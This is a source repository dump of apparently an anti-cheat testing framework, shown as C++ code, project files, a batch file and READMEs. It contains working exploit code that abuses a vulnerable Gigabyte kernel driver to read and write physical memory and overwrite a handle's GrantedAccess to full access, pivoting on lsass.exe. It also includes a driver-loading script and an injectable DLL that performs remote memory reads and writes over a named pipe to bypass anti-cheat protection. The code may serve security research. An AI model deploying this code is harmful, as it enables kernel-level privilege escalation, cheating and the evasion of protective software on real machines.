| 24 | // Kernel offsets 25 | // W10 26 | #define OFFSET_IMAGEFILENAME 0x450 27 | #define OFFSET_OBJECTTABLE 0x418 28 | 29 | #pragma comment(lib, "ntdll.lib") 30 | 31 | 32 | ULONG64 GIO_mapPhysical(ULONG64 physicaladdress, DWORD size) 33 | { 34 | READ_REQUEST inbuffer = { 0, 0, physicaladdress, 0, size }; 35 | ULONG64 outbuffer[2] = { 0 }; 36 | DWORD bytes_returned = 0; 37 | DeviceIoControl(DriverHelper::hDeviceDrv, 38 | IOCTL_GIO_MAPPHYSICAL, 39 | &inbuffer, 40 | sizeof(inbuffer), 41 | &outbuffer, 42 | sizeof(outbuffer), 43 | &bytes_returned, 44 | (LPOVERLAPPED)NULL); 45 | 46 | return outbuffer[0]; 47 | } 48 | 49 | ULONG64 GIO_unmapPhysical(ULONG64 address) 50 | { 51 | ULONG64 inbuffer = address; 52 | ULONG64 outbuffer[2] = { 0 }; 53 | DWORD bytes_returned = 0; 54 | DeviceIoControl(DriverHelper::hDeviceDrv, 55 | IOCTL_GIO_UNMAPPHYSICAL, 56 | (LPVOID)&inbuffer, 57 | sizeof(inbuffer), 58 | (LPVOID)outbuffer, 59 | sizeof(outbuffer), 60 | &bytes_returned, 61 | (LPOVERLAPPED)NULL); 62 | 63 | return outbuffer[0]; 64 | } 65 | 66 | BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size) 67 | { 68 | MEMCPY_REQUEST mystructIn = { dest, src, size }; 69 | BYTE outbuffer[0x30] = { 0 }; 70 | DWORD returned = 0; 71 | 72 | DeviceIoControl(DriverHelper::hDeviceDrv, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); 73 | if (returned) { 74 | return TRUE; 75 | } 76 | return FALSE; 77 | } 78 | 79 | 80 | 81 | ULONG64 GPCI_mapPhysical(DWORDLONG physicaladdress, DWORD size) 82 | { 83 | READ_REQUEST inbuffer = { physicaladdress, size }; 84 | ULONG64 outbuffer[2] = {0}; 85 | DWORD bytes_returned = 0; 86 | DeviceIoControl(DriverHelper::hDeviceDrv, 87 | IOCTL_MAPPHYSICAL, 88 | &inbuffer, 89 | sizeof(inbuffer), 90 | &outbuffer, 91 | sizeof(outbuffer), 92 | &bytes_returned, 93 | (LPOVERLAPPED)NULL); 94 | 95 | return outbuffer[0]; 96 | } 97 | 98 | ULONG64 GPCI_unmapPhysical(ULONG64 address) 99 | { 100 | ULONG64 inbuffer = address; 101 | ULONG64 outbuffer[2] = { 0 }; 102 | DWORD bytes_returned = 0; 103 | 104 | DeviceIoControl(DriverHelper::hDeviceDrv, 105 | IOCTL_UNMAPPHYSICAL, 106 | (LPVOID)&inbuffer, 107 | sizeof(inbuffer), 108 | (LPVOID)outbuffer, 109 | sizeof(outbuffer), 110 | &bytes_returned, 111 | (LPOVERLAPPED)NULL); 112 | 113 | return outbuffer[0]; 114 | } 115 | 116 | _EPROCESS_PATTERN pivotProcess = { "lsass.exe", 0x2 }; 117 | PBYTE ppivotProcess = NULL; 118 | 119 | 120 | int main() 121 | { 122 | std::cout << "[+] Init" << std::endl; 123 | CheatHelper::loadConfig(); 124 | 125 | 126 | // Connecting the vulnerable driver (GPCIDrv64.sys AORUS GRAPHICS ENGINE v1.25) 127 | std::cout << "[+] Obtaining HANDLE to Drv" << std::endl; 128 | if (DriverHelper::getDeviceHandle(CheatHelper::driverName)) 129 | { 130 | return 1; 131 | } 132 | 133 | // If we want to change the driver, we just need to create our functions for communication and set the following variables 134 | DriverHelper::fn_memcpy = (_fn_memcpy)GIO_memcpy; 135 | DriverHelper::fn_mapPhysical = (_fn_mapPhysical)GIO_mapPhysical; 136 | DriverHelper::fn_unmapPhysical = (_fn_unmapPhysical)GIO_unmapPhysical; 137 | 138 | DWORDLONG stopAddress = _UI64_MAX; 139 | DWORD searchSpace = 0x00001000; 140 | 141 | PBYTE ppivotProcess = (PBYTE)malloc(sizeof(_EPROCESS_PATTERN)); 142 | memcpy(ppivotProcess, &pivotProcess, sizeof(_EPROCESS_PATTERN)); 143 | 144 | 145 | ULONG64 objectTable = DriverHelper::findPhisical_ObjectTable(CheatHelper::startAddressPhy, stopAddress, searchSpace, ppivotProcess, sizeof(_EPROCESS_PATTERN)); 146 | Sleep(1000); 147 | void** pObjectTable = (void**)objectTable; 148 | 149 | PBYTE pHandleTable = (PBYTE)malloc(sizeof(_HANDLE_TABLE)); 150 | DriverHelper::fn_memcpy((ULONG64)pHandleTable, (ULONG64)*pObjectTable, sizeof(_HANDLE_TABLE)); 151 | 152 | ULONG64 entryAddr = (ULONG64)malloc(sizeof(_HANDLE_TABLE_ENTRY)); 153 | 154 | //TODO: add offsets and test in W7 155 | entryAddr = DriverHelper::ExpLookupHandleTableEntryW10((ULONGLONG)pHandleTable, (ULONGLONG)CheatHelper::requestHandleDrv); 156 | 157 | HANDLE_TABLE_ENTRY entry; 158 | DriverHelper::fn_memcpy((ULONG64)&entry, entryAddr, sizeof(_HANDLE_TABLE_ENTRY)); 159 | 160 | Sleep(1000); 161 | std::cout << "[+] GrantedAccess original: " << std::hex << entry.GrantedAccess << std::endl; 162 | entry.GrantedAccess = 0x1FFFFF; 163 | 164 | DriverHelper::fn_memcpy(entryAddr + sizeof(ULONGLONG), (ULONG64)&entry + sizeof(ULONGLONG), sizeof(_HANDLE_TABLE_ENTRY) - sizeof(+sizeof(ULONGLONG))); 165 | std::cout << "[+] GrantedAccess overwritten" << std::endl; 166 | return 0; 167 | 168 | } -------------------------------------------------------------------------------- /HandleElevationDriver/HandleElevationDriver.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {97D0792B-4385-450B-9E85-79494037D730} 24 | Win32Proj 25 | HandleElevationDriver 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper;$(SolutionDir)DriverHelper;%(AdditionalIncludeDirectories) 95 | 96 | 97 | Console 98 | true 99 | $(SolutionDir)x64\Debug;%(AdditionalLibraryDirectories) 100 | %(AdditionalDependencies) 101 | 102 | 103 | 104 | 105 | Use 106 | Level3 107 | Disabled 108 | true 109 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 110 | true 111 | pch.h 112 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 113 | 114 | 115 | Console 116 | true 117 | 118 | 119 | 120 | 121 | Use 122 | Level3 123 | MaxSpeed 124 | true 125 | true 126 | true 127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 128 | true 129 | pch.h 130 | 131 | 132 | Console 133 | true 134 | true 135 | true 136 | 137 | 138 | 139 | 140 | NotUsing 141 | Level3 142 | MaxSpeed 143 | true 144 | true 145 | true 146 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 147 | true 148 | pch.h 149 | $(SolutionDir)CheatHelper;$(SolutionDir)DriverHelper;%(AdditionalIncludeDirectories) 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 172 | {a080c117-d1db-4671-8217-65496573ba4d} 173 | 174 | 175 | {36244ba2-d910-4746-8ed2-7cfa55fb4de9} 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | -------------------------------------------------------------------------------- /HandleElevationDriver/HandleElevationDriver.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /HandleElevationDriver/LoadDriver.bat: -------------------------------------------------------------------------------- 1 | sc create Gigabyte binpath= "F:\Recon2019\AntiCheat-Testing-Framework\resources\gdrv.sys" type= kernel 2 | sc start Gigabyte -------------------------------------------------------------------------------- /HandleElevationDriver/Readme.md: -------------------------------------------------------------------------------- 1 | # Handle Elevation Driver 2 | 3 | ## Introduction 4 | 5 | Implementation that abuse of a vulnerable driver to Read/Write from physical memory in order to perform a **DKOM** attack. The module will locate the target handle from an specific process and elevate the GrantedAccess to get PROCESS_ALL_ACCESS. 6 | The main purpose is to elevate a HANDLE so we don't need to create a new one. 7 | This implementation uses gigabyte driver to achiev its goal, however, changing the vulnerable driver should be quite easy, given that all the methods are created in a modular way inside DriverHelper. 8 | 9 | ## Usage 10 | 11 | This module makes use of **DriverHelper** and **CheatHelper**. 12 | HandleHijakingMaster will create a NamedPipe that the DLL will use to receive instructions and then return information to the master (where all the bot logic should be located). 13 | 14 | ## Configuration 15 | 16 | This module requires configuration: 17 | 18 | - The following variables in config.ini need to the provided: 19 | 20 | [Addresses] 21 | ``` 22 | startAddressPhyHigh=0x00000000 23 | startAddressPhyLow=0x58A60000 24 | startAddressPhy=0x0 25 | ``` 26 | 27 | [Handles] 28 | ``` 29 | requestHandleDrv=0x15FC 30 | ``` 31 | 32 | [Strings] 33 | ``` 34 | privotProc=lsass.exe 35 | driverName=\\.\GIO 36 | ``` 37 | 38 | 39 | ## Notes 40 | 41 | - startPhysicalAddress: Physical memory to start looking for EPROCESS structures. 42 | - driverName: Name of the driver device to exploit 43 | - requestHandleDrv: HANDLE number to elevate and use as pivot 44 | 45 | -------------------------------------------------------------------------------- /HandleElevationDriver/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /HandleElevationDriver/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /HandleHijackingDLL/HandleHijackingDLL.cpp: -------------------------------------------------------------------------------- 1 | // HandleHijackingDLL.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include "CheatHelper.h" 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | // EDIT if you modified the original name 14 | char tmp[] = "\\\\.\\pipe\\driverbypass"; 15 | 16 | 17 | HANDLE hNamedPipe; 18 | PipeMessageRequest PMRequest; 19 | PipeMessageResponse PMResponse; 20 | 21 | int ConnectPipe(LPTSTR name) 22 | { 23 | 24 | hNamedPipe = CreateFile(name, GENERIC_READ | GENERIC_WRITE, 25 | 0, NULL, OPEN_EXISTING, 0, NULL); 26 | 27 | while (1) 28 | { 29 | if (hNamedPipe != INVALID_HANDLE_VALUE) 30 | { 31 | std::cout << "[+] Connected." << std::endl; 32 | break; 33 | } 34 | else 35 | { 36 | std::cout << "[-] Couldn't connect: " << std::dec << GetLastError() << std::endl; 37 | continue; 38 | } 39 | } 40 | return 0; 41 | } 42 | 43 | int WritePipe(struct PipeMessageResponse response) 44 | { 45 | 46 | BOOL bWrite; 47 | DWORD dwWritten; 48 | //const char *buffer = "Ready"; 49 | std::cout << "[+] Sending Msg: " << std::endl; 50 | std::cout << "\t[+] status: " << response.status << std::endl; 51 | std::cout << "\t[+] bytesRead: " << response.bytesRead << std::endl; 52 | std::cout << "\t[+] buffer: "; 53 | CheatHelper::PrintBytes((PVOID)response.buffer, response.bytesRead); 54 | bWrite = WriteFile(hNamedPipe, &response, sizeof(PipeMessageResponse), &dwWritten, NULL); 55 | if (!bWrite) 56 | { 57 | std::cout << "[-] Failed writing: " << std::dec << GetLastError() << std::endl; 58 | return 0; 59 | } 60 | else 61 | { 62 | std::cout << "\t[+] Success writing." << std::endl; 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | 69 | int ReadPipe() { 70 | //HANDLE hHeap = GetProcessHeap(); 71 | //void* message = HeapAlloc(hHeap, 0, BUFSIZE); 72 | //message = HeapAlloc(hHeap, 0, BUFSIZE); 73 | DWORD dwRead; 74 | BOOL bRead; 75 | std::cout << "[+] Waiting for message. " << std::endl; 76 | 77 | bRead = ReadFile(hNamedPipe, &PMRequest, sizeof(PipeMessageRequest), &dwRead, NULL); 78 | 79 | if (!bRead) 80 | { 81 | std::cout << "[-] Failed reading Pipe: " << std::dec << GetLastError() << std::endl; 82 | return 0; 83 | } 84 | else 85 | { 86 | std::cout << "\t[+] action: " << PMRequest.action << std::endl; 87 | std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl; 88 | std::cout << "\t[+] address: 0x" << PMRequest.address << std::endl; 89 | std::cout << "\t[+] size: " << PMRequest.size << std::endl; 90 | std::cout << "\t[+] buffer: "; 91 | CheatHelper::PrintBytes((PVOID)PMRequest.buffer, PMRequest.size); 92 | return 1; 93 | } 94 | } 95 | 96 | 97 | int handleAction() 98 | { 99 | switch (PMRequest.action) { 100 | case 0: //Ping 101 | { 102 | std::cout << '0' << std::endl; 103 | break; 104 | } 105 | case 1: //RPM 106 | { 107 | std::cout << '1' << std::endl; 108 | SIZE_T stRead = 0; 109 | 110 | int status = CheatHelper::RPM((HANDLE)PMRequest.handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, &PMResponse.bytesRead); 111 | 112 | if (status == 0)//SUCCESS 113 | { 114 | PMResponse.status = 0; 115 | return 0; 116 | } 117 | 118 | PMResponse.status = 1; 119 | return 1; 120 | } 121 | case 2: //WPM 122 | { 123 | std::cout << '2' << std::endl; 124 | SIZE_T stWrite = 0; 125 | 126 | int status = CheatHelper::WPM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, &stWrite); 127 | 128 | if (status == 0) //SUCCESS 129 | { 130 | PMResponse.status = 0; 131 | return 0; 132 | } 133 | 134 | PMResponse.status = 1; 135 | return 1; 136 | } 137 | case 3: //CreatRemoteThread 138 | { 139 | std::cout << '3' << std::endl; 140 | break; 141 | } 142 | case 4: //NtReadVirtualMemory 143 | { 144 | std::cout << '4' << std::endl; 145 | 146 | auto status = CheatHelper::NtRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 147 | 148 | if (status == 0) 149 | { 150 | PMResponse.status = 0; 151 | return 0; 152 | } 153 | 154 | PMResponse.status = 1; 155 | return 1; 156 | 157 | } 158 | case 5: //NtWriteVirtualMemory 159 | { 160 | std::cout << '5' << std::endl; 161 | SIZE_T stWrite = 0; 162 | 163 | int status = CheatHelper::NtWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 164 | if (status == 0) 165 | { 166 | PMResponse.status = 0; 167 | return 0; 168 | } 169 | 170 | PMResponse.status = 1; 171 | return 1; 172 | } 173 | case 6: //ZwReadVirtualMemory 174 | { 175 | std::cout << '6' << std::endl; 176 | 177 | auto status = CheatHelper::ZwRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 178 | 179 | if (status == 0) 180 | { 181 | PMResponse.status = 0; 182 | return 0; 183 | } 184 | 185 | PMResponse.status = 1; 186 | return 1; 187 | 188 | } 189 | case 7: //ZwWriteVirtualMemory 190 | { 191 | std::cout << '7' << std::endl; 192 | SIZE_T stWrite = 0; 193 | 194 | int status = CheatHelper::ZwWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 195 | if (status == 0) 196 | { 197 | PMResponse.status = 0; 198 | return 0; 199 | } 200 | 201 | PMResponse.status = 1; 202 | return 1; 203 | } 204 | default: 205 | { 206 | std::cout << "Default" << std::endl; 207 | return 1; 208 | } 209 | } 210 | } 211 | 212 | 213 | 214 | 215 | int main() { 216 | 217 | // UNCOMMENT IF: We need to delay the connection to the Master. 218 | //Sleep(300000); 219 | 220 | strncpy_s(CheatHelper::namedPipeName, tmp, _countof(tmp)); 221 | 222 | CheatHelper::ConsoleSetup("Client"); 223 | 224 | ConnectPipe(CheatHelper::namedPipeName); 225 | 226 | 227 | PMResponse.status = 1; 228 | 229 | WritePipe(PMResponse); 230 | 231 | while (1) 232 | { 233 | ReadPipe(); 234 | 235 | 236 | //int handle = 0xBF8; 237 | //LPVOID buffer; 238 | //TODO: Add loop and reconnection 239 | int success = handleAction(); 240 | 241 | 242 | WritePipe(PMResponse); 243 | 244 | // if it is the last possible action -> break 245 | if (PMRequest.action == 7) 246 | { 247 | break; 248 | } 249 | 250 | } 251 | 252 | 253 | 254 | 255 | } 256 | 257 | 258 | BOOL APIENTRY DllMain(HMODULE hModule, 259 | DWORD ul_reason_for_call, 260 | LPVOID lpReserved 261 | ) 262 | { 263 | switch (ul_reason_for_call) 264 | { 265 | case DLL_PROCESS_ATTACH: 266 | { 267 | DisableThreadLibraryCalls(hModule); 268 | CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)main, NULL, NULL, NULL); 269 | } 270 | case DLL_THREAD_ATTACH: 271 | case DLL_THREAD_DETACH: 272 | case DLL_PROCESS_DETACH: 273 | break; 274 | } 275 | return TRUE; 276 | } 277 | 278 | 279 | 280 | -------------------------------------------------------------------------------- /HandleHijackingDLL/HandleHijackingDLL.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {FA4A27D2-1F04-4DDA-A10C-D19640522328} 24 | Win32Proj 25 | HandleHijackingDLL 26 | 10.0.17763.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 92 | true 93 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 94 | 95 | 96 | Windows 97 | true 98 | 99 | 100 | 101 | 102 | NotUsing 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 107 | true 108 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 109 | 110 | 111 | Windows 112 | true 113 | %(AdditionalDependencies) 114 | C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 115 | 116 | 117 | 118 | 119 | Use 120 | Level3 121 | MaxSpeed 122 | true 123 | true 124 | true 125 | WIN32;NDEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 126 | true 127 | 128 | 129 | Windows 130 | true 131 | true 132 | true 133 | 134 | 135 | 136 | 137 | NotUsing 138 | Level3 139 | MaxSpeed 140 | true 141 | true 142 | true 143 | _CRT_SECURE_NO_WARNINGS;NDEBUG;HANDLEHIJACKINGDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 144 | true 145 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 146 | 147 | 148 | Windows 149 | true 150 | true 151 | true 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | Create 162 | Create 163 | Create 164 | Create 165 | 166 | 167 | 168 | 169 | {a080c117-d1db-4671-8217-65496573ba4d} 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | -------------------------------------------------------------------------------- /HandleHijackingDLL/HandleHijackingDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /HandleHijackingDLL/README.md: -------------------------------------------------------------------------------- 1 | # HandleHijacking DLL 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combinaded with **HandleHijackingMaster**. This is the DLL implementation that has to be injected into a process that already has a handle to the game. 9 | 10 | HandleHijakingMaster will create a NamedPipe that this module uses to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | 13 | ## Combination with other techniques 14 | 15 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 16 | 17 | 18 | -------------------------------------------------------------------------------- /HandleHijackingDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /HandleHijackingDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /HandleHijackingDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /HandleHijackingMaster/HandleHijackingMaster.cpp: -------------------------------------------------------------------------------- 1 | // HandleHijackingMaster.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include "CheatHelper.h" 6 | #include 7 | 8 | HANDLE hPipeServer; 9 | HANDLE hProcessOP; 10 | HANDLE hProcessNtOP; 11 | HANDLE hHeap = GetProcessHeap(); 12 | void* message = HeapAlloc(hHeap, 0, BUFSIZE); 13 | 14 | typedef struct _CLIENT_ID 15 | { 16 | HANDLE UniqueProcess; 17 | HANDLE UniqueThread; 18 | } CLIENT_ID, *PCLIENT_ID; 19 | 20 | typedef struct _UNICODE_STRING 21 | { 22 | USHORT Length; 23 | USHORT MaximumLength; 24 | PWSTR Buffer; 25 | } UNICODE_STRING, *PUNICODE_STRING; 26 | 27 | typedef struct _OBJECT_ATTRIBUTES { 28 | ULONG Length; 29 | HANDLE RootDirectory; 30 | PUNICODE_STRING ObjectName; 31 | ULONG Attributes; 32 | PVOID SecurityDescriptor; 33 | PVOID SecurityQualityOfService; 34 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 35 | 36 | typedef NTSTATUS(NTAPI* TNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientID); 37 | TNtOpenProcess NtOpenProcess = NULL; 38 | 39 | int StartPipe() 40 | { 41 | //std::string namedPipeName = "\\\\.\\pipe\\driverbypass"; 42 | //LPCSTR namedPipe = namedPipeName.c_str(); 43 | hPipeServer = CreateNamedPipe(CheatHelper::namedPipeName, PIPE_ACCESS_DUPLEX | PIPE_TYPE_BYTE | PIPE_READMODE_BYTE, 44 | PIPE_WAIT, 45 | PIPE_UNLIMITED_INSTANCES, BUFSIZE, BUFSIZE, 0, NULL); 46 | 47 | if (hPipeServer != NULL) 48 | { 49 | std::cout << "[+] NamedPipe created: " << CheatHelper::namedPipeName << std::endl; 50 | } 51 | else 52 | { 53 | std::cout << "[-] Couldn't create: " << std::dec << GetLastError() << std::endl; 54 | return 0; 55 | } 56 | 57 | while (hPipeServer != NULL) 58 | { 59 | if (ConnectNamedPipe(hPipeServer, NULL) != FALSE) 60 | { 61 | std::cout << "[+] New connection received" << std::endl; 62 | break; 63 | } 64 | } 65 | return 1; 66 | } 67 | 68 | PipeMessageRequest PMRequest; 69 | PipeMessageResponse PMResponse; 70 | 71 | int ReadPipe() { 72 | DWORD dwRead; 73 | BOOL bRead; 74 | std::cout << "[+] Waiting for message. " << std::endl; 75 | 76 | bRead = ReadFile(hPipeServer, &PMResponse, sizeof(PipeMessageResponse), &dwRead, NULL); 77 | 78 | if (!bRead) 79 | { 80 | std::cout << "[-] Failed reading Pipe: " << std::dec << GetLastError() << std::endl; 81 | return 0; 82 | } 83 | else 84 | { 85 | if (PMResponse.status == 0) 86 | { 87 | std::cout << "\t[+] Status: Successful" << std::endl; 88 | if (PMRequest.action == 1 || PMRequest.action == 4 || PMRequest.action == 6) 89 | { 90 | std::cout << "\t[+] bytesRead: " << PMResponse.bytesRead << std::endl; 91 | std::cout << "\t[+] buffer: "; 92 | CheatHelper::PrintBytes((PVOID)PMResponse.buffer, PMResponse.bytesRead); 93 | } 94 | } 95 | else 96 | { 97 | std::cout << "\t[-] Status: Unsuccessful" << std::endl; 98 | } 99 | 100 | return 1; 101 | } 102 | } 103 | 104 | int WritePipe() 105 | { 106 | 107 | BOOL bWrite; 108 | DWORD dwWritten; 109 | //const char *buffer = "Ready"; 110 | std::cout << "[+] Sending Msg: " << std::endl; 111 | std::cout << "\t[+] action: " << PMRequest.action << std::endl; 112 | std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl; 113 | std::cout << "\t[+] address: 0x" << std::hex << PMRequest.address << std::endl; 114 | std::cout << "\t[+] size: " << PMRequest.size << std::endl; 115 | std::cout << "\t[+] buffer: "; 116 | CheatHelper::PrintBytes((PVOID)PMRequest.buffer, PMRequest.size); 117 | bWrite = WriteFile(hPipeServer, &PMRequest, sizeof(PipeMessageRequest), &dwWritten, NULL); 118 | if (!bWrite) 119 | { 120 | std::cout << "[-] Failed writing: " << std::dec << GetLastError() << std::endl; 121 | return 0; 122 | } 123 | else 124 | { 125 | std::cout << "[+] Success writing." << std::endl; 126 | return 1; 127 | } 128 | 129 | } 130 | 131 | 132 | void handleTests(HANDLE handle) 133 | { 134 | SIZE_T stRead = 0; 135 | SIZE_T stWrite = 0; 136 | 137 | PMRequest.action = 1; 138 | CheatHelper::prepareRequest(PMRequest); 139 | 140 | CheatHelper::RPM((HANDLE)handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL); 141 | 142 | PMRequest.action = 2; 143 | CheatHelper::prepareRequest(PMRequest); 144 | 145 | CheatHelper::WPM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 146 | 147 | PMRequest.action = 4; 148 | CheatHelper::prepareRequest(PMRequest); 149 | 150 | CheatHelper::NtRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL); 151 | 152 | 153 | PMRequest.action = 5; 154 | CheatHelper::prepareRequest(PMRequest); 155 | 156 | 